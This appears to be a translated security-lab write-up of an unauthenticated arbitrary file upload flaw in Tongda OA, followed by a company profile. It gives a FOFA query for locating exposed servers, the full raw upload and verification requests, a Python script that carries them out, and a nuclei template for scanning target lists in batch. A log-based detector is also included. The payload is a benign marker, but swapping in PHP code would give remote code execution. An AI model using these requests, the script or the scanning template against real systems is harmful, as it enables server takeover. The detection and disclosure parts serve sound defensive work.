0x01 Vulnerability Description
Tongda OA (OfficeAnywhere network intelligent office system) is collaborative office-automation software developed by Beijing Tongda Xinke Technology Co., Ltd. (北京通达信科科技有限公司); it is a comprehensive management and office platform shaped by Chinese enterprise management practice. Tongda OA has an arbitrary file upload vulnerability: an attacker can upload arbitrary files through a specific interface (the ueditor action_upload.php endpoint shown below) and thereby gain control of the server.
0x02 Vulnerability Reproduction
FOFA query: "通达-OA"
1. Upload a file named eee.php to the web root with the content 0xold6. In the request below, the CONFIG[...] form fields supply the upload field name (ffff), the size limit, the save name (filePathFormat = eee) and the allowed extension list (.php) from the client side, so the uploaded test.php is written as eee.php under the web root. Note that the POST carries no session cookie.
POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Go-http-client/1.1
Content-Length: 880
Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
X_requested_with: XMLHttpRequest
Accept-Encoding: gzip

-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileFieldName]"

ffff
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

1000000000
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[filePathFormat]"

eee
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

.php
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="ffff"; filename="test.php"
Content-Type: application/octet-stream

0xold6
-----------------------------55719851240137822763221368724
Content-Disposition: form-data; name="mufile"

submit
-----------------------------55719851240137822763221368724--
2. Request eee.php: the response body returns 0xold6, confirming that the file was uploaded to the web root and is served from there.
GET /eee.php HTTP/1.1
Host: x.x.x.x:8082
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=vm1hud5b14spa0ulldoa63njt2; KEY_RANDOMDATA=2342
Upgrade-Insecure-Requests: 1
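The two steps above, as an added example script that is not part of the original article: it rebuilds the multipart body from the captured request (the CONFIG[...] fields, the ffff file part and the mufile part), sends it, then fetches /eee.php and looks for the marker. The endpoint, field names, save name and marker are taken from the request above; the boundary string, the http_send helper and the injectable send() parameter are assumptions of this script, introduced so the logic can be exercised without a live host.

```python
import http.client

# Added example, not from the original article. The endpoint, form fields,
# marker string and save name come from the captured request; BOUNDARY and
# the send() helper are assumptions of this script.
UPLOAD_PATH = "/module/ueditor/php/action_upload.php?action=uploadfile"
BOUNDARY = "----TongdaOAUploadCheck"   # any unique string works as a boundary
MARKER = "0xold6"                       # benign content, echoed back if the file is live


def build_upload_body(field_name="ffff", save_name="eee", ext=".php",
                      filename="test.php", content=MARKER, boundary=BOUNDARY):
    """Rebuild the multipart body of step 1.

    The CONFIG[...] parts are the whole point: the upload handler's field
    name, size limit, save name (filePathFormat) and allowed-extension list
    all arrive from the client, so a .php upload saved as <save_name>.php is
    accepted without any server-side restriction.
    """
    fields = [
        ("CONFIG[fileFieldName]", field_name),
        ("CONFIG[fileMaxSize]", "1000000000"),
        ("CONFIG[filePathFormat]", save_name),
        ("CONFIG[fileAllowFiles][]", ext),
    ]
    lines = []
    for name, value in fields:
        lines += ["--" + boundary,
                  'Content-Disposition: form-data; name="%s"' % name,
                  "", value]
    lines += ["--" + boundary,
              'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, filename),
              "Content-Type: application/octet-stream",
              "", content]
    lines += ["--" + boundary,
              'Content-Disposition: form-data; name="mufile"',
              "", "submit"]
    lines += ["--" + boundary + "--", ""]
    return "\r\n".join(lines).encode()


def http_send(host, port, timeout=10):
    """Return a send(method, path, headers, body) -> (status, body) closure over http.client."""
    def send(method, path, headers=None, body=None):
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(method, path, body=body, headers=headers or {})
            resp = conn.getresponse()
            return resp.status, resp.read()
        finally:
            conn.close()
    return send


def check_target(send, save_name="eee"):
    """Steps 1 and 2: upload the marker file, then fetch /<save_name>.php.

    Returns True only if the fetched page is served (200) and contains the
    marker, i.e. the upload landed under the web root as <save_name>.php.
    `send` is injected so the logic can run without a live host.
    """
    body = build_upload_body(save_name=save_name)
    headers = {
        "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
        "Content-Length": str(len(body)),
        "X_requested_with": "XMLHttpRequest",
    }
    send("POST", UPLOAD_PATH, headers, body)
    status, page = send("GET", "/%s.php" % save_name)
    return status == 200 and MARKER.encode() in page


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 8082
    print("vulnerable" if check_target(http_send(host, port)) else "not confirmed")
```

Run it as `python3 check.py x.x.x.x 8082` against a host you are authorized to test. The uploaded content is the same harmless marker the article uses, not a webshell; the check only proves that a client-chosen .php name is written under the web root and served.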
3. Write a nuclei template
nuclei command (replace -u with -l to verify a list of targets in batch):
nuclei.exe -t tongdaOA_Action_upload.yaml -u http://x.x.x.x
Template (written for the requests: key of the nuclei v2 template format; the word matcher looks for the marker 0xold6 in the response bodies):
id: tongdaOA_Action_upload

info:
  name: TongdaOA Action_upload
  author: sm
  severity: critical
  tags: TongdaOA

requests:
  - raw:
      - |
        POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Go-http-client/1.1
        Content-Length: 880
        Content-Type: multipart/form-data; boundary=---------------------------55719851240137822763221368724
        X_requested_with: XMLHttpRequest
        Accept-Encoding: gzip

        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="CONFIG[fileFieldName]"

        ffff
        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="CONFIG[fileMaxSize]"

        1000000000
        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="CONFIG[filePathFormat]"

        eee
        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"

        .php
        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="ffff"; filename="test.php"
        Content-Type: application/octet-stream

        0xold6
        -----------------------------55719851240137822763221368724
        Content-Disposition: form-data; name="mufile"

        submit
        -----------------------------55719851240137822763221368724--

      - |
        GET /eee.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Cookie: PHPSESSID=vm1hud5b14spa0ulldoa63njt2; KEY_RANDOMDATA=2342
        Upgrade-Insecure-Requests: 1

    matchers:
      - type: word
        part: body
        words:
          - "0xold6"
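The nuclei template verifies a target from the attacker's side; the same two requests are what a defender would look for in the web server's access log. The following is an added example, not code from the original article: it parses combined-format access log lines and pairs a POST to /module/ueditor/php/action_upload.php?action=uploadfile with a later successful GET of a .php file directly under the web root from the same source, which is exactly the step 1 / step 2 sequence above. The sample log lines, IPs and timestamps are constructed for the demonstration; the only facts taken from the article are the endpoint, the query string and the /eee.php result.

```python
import re

# Added example, not from the original article. SAMPLE_LOG is constructed
# in Apache/Nginx "combined" format; IPs, timestamps and the benign
# requests are made up for the demonstration.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2022:10:00:01 +0800] "POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1" 200 120 "-" "Go-http-client/1.1"
10.0.0.5 - - [01/Sep/2022:10:00:02 +0800] "GET /eee.php HTTP/1.1" 200 6 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2022:10:01:00 +0800] "GET /general/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2022:10:01:05 +0800] "POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Sep/2022:10:01:06 +0800] "GET /static/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Sep/2022:10:02:00 +0800] "GET /login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/module/ueditor/php/action_upload.php"
ROOT_PHP_RE = re.compile(r"^/[^/?]+\.php$")  # a .php file directly under the web root


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {"ip": m.group("ip"), "method": m.group("method"), "path": path,
            "query": query, "status": int(m.group("status"))}


def is_upload_call(ev):
    """POST to the ueditor action_upload endpoint with action=uploadfile (step 1)."""
    return (ev["method"] == "POST" and ev["path"] == UPLOAD_ENDPOINT
            and "action=uploadfile" in ev["query"].split("&"))


def find_upload_then_exec(lines):
    """Return (ip, path) pairs where a source hit the upload endpoint and
    later fetched a .php directly under the web root that answered 200,
    i.e. the step 1 / step 2 sequence from the reproduction. A GET of a
    root-level .php from a source that never called the endpoint (10.0.0.7
    in the sample) is not flagged."""
    uploaded = set()
    hits = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        if is_upload_call(ev):
            uploaded.add(ev["ip"])
        elif (ev["ip"] in uploaded and ev["method"] == "GET"
              and ev["status"] == 200 and ROOT_PHP_RE.match(ev["path"])):
            hits.append((ev["ip"], ev["path"]))
    return hits


def upload_callers(lines):
    """Every source that POSTed to the upload endpoint, regardless of follow-up;
    the endpoint itself deserves an alert because the captured request needs no session."""
    return sorted({ev["ip"] for ev in map(parse_line, lines)
                   if ev and is_upload_call(ev)})


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("upload endpoint callers:", upload_callers(lines))
    print("upload followed by root .php fetch:", find_upload_then_exec(lines))
```

The pairing is deliberately simple: the access log does not record the POST body, so the CONFIG[...] fields cannot be inspected there; what is observable is the endpoint, the query string, and a new .php name appearing at the web root right after. A request to the endpoint alone is the lower-fidelity signal, the pair is the higher-fidelity one.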
(Note: this article is shared for technical purposes only; any unauthorized attack is prohibited)
0x03 About the Company
Jiangxi Yurongyun Security Technology Co., Ltd. (江西渝融云安全科技有限公司), founded in 2017, has grown into a local high-tech company integrating cloud security, IoT security, data security, MLPS (等保) compliance construction, risk assessment, IT application innovation (信创) and cyber-security talent training. It is an enterprise in Jiangxi Province's information security industry chain and a member of the Jiangxi provincial government's emergency response teams for cyber-security incidents in key sectors.
The company holds multiple qualifications, including Information Security Integration Level 3, Information System Security Operations and Maintenance Level 3 and Risk Assessment Level 3, and owns eighteen software copyrights. It won third prize in the 2020 National ICS Security Deep Tour attack-and-defense competition and received honours such as an outstanding case award for information security emergency support during the CPC centenary celebrations...
Prepared by: sm
Reviewed by: fjh
Reviewed by: Dog
Originally published on the WeChat official account 融云攻防实验室: Vulnerability Reproduction: Tongda OA v2017 Action_upload Arbitrary File Upload Vulnerability